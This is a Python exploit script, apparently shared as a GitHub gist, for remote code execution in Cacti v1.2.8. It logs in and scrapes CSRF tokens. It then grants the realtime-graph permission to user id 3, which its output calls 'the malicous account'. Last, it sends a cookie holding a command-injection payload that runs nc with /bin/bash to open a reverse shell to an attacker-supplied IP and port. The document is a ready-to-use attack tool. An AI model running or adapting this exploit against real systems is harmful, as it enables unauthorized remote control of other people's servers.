| #!/usr/bin/python3 | |
| # Exploit Title: Cacti v1.2.8 Remote Code Execution | |
| # Date: 03/02/2020 | |
| # Exploit Author: Askar (@mohammadaskar2) | |
| # Vendor Homepage: https://cacti.net/ | |
| # Version: v1.2.8 | |
| # Tested on: CentOS 7.3 / PHP 7.1.33 | |
| import requests | |
| import sys | |
| import warnings | |
| from bs4 import BeautifulSoup | |
| from urllib.parse import quote | |
| warnings.filterwarnings("ignore", category=UserWarning, module='bs4') | |
| if len(sys.argv) != 6: | |
| print(len(sys.argv)) | |
| print("[~] Usage : ./Cacti-exploit.py url username password ip port") | |
| exit() | |
| url = sys.argv[1] | |
| username = sys.argv[2] | |
| password = sys.argv[3] | |
| ip = sys.argv[4] | |
| port = sys.argv[5] | |
| def login(token): | |
| login_info = { | |
| "login_username": username, | |
| "login_password": password, | |
| "action": "login", | |
| "__csrf_magic": token | |
| } | |
| login_request = request.post(url+"/index.php", login_info) | |
| login_text = login_request.text | |
| if "Invalid User Name/Password Please Retype" in login_text: | |
| return False | |
| else: | |
| return True | |
| def enable_guest(token): | |
| request_info = { | |
| "id": "3", | |
| "section25": "on", | |
| "section7": "on", | |
| "tab": "realms", | |
| "save_component_realm_perms": 1, | |
| "action": "save", | |
| "__csrf_magic": token | |
| } | |
| enable_request = request.post(url+"/user_admin.php?header=false", request_info) | |
| if enable_request: | |
| return True | |
| else: | |
| return False | |
| def send_exploit(): | |
| payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) | |
| cookies = {'Cacti': quote(payload)} | |
| requests.get(url+"/graph_realtime.php?action=init", cookies=cookies) | |
| request = requests.session() | |
| print("[+]Retrieving login CSRF token") | |
| page = request.get(url+"/index.php") | |
| html_content = page.text | |
| soup = BeautifulSoup(html_content, "html5lib") | |
| token = soup.findAll('input')[0].get("value") | |
| if token: | |
| print("[+]Token Found : %s" % token) | |
| print("[+]Sending creds ..") | |
| login_status = login(token) | |
| if login_status: | |
| print("[+]Successfully LoggedIn") | |
| print("[+]Retrieving CSRF token ..") | |
| page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms") | |
| html_content = page.text | |
| soup = BeautifulSoup(html_content, "html5lib") | |
| token = soup.findAll('input')[1].get("value") | |
| if token: | |
| print("[+]Making some noise ..") | |
| guest_realtime = enable_guest(token) | |
| if guest_realtime: | |
| print("[+]Sending malicous request, check your nc ;)") | |
| send_exploit() | |
| else: | |
| print("[-]Error while activating the malicous account") | |
| else: | |
| print("[-] Unable to retrieve CSRF token from admin page!") | |
| exit() | |
| else: | |
| print("[-]Cannot Login!") | |
| else: | |
| print("[-] Unable to retrieve CSRF token!") | |
| exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment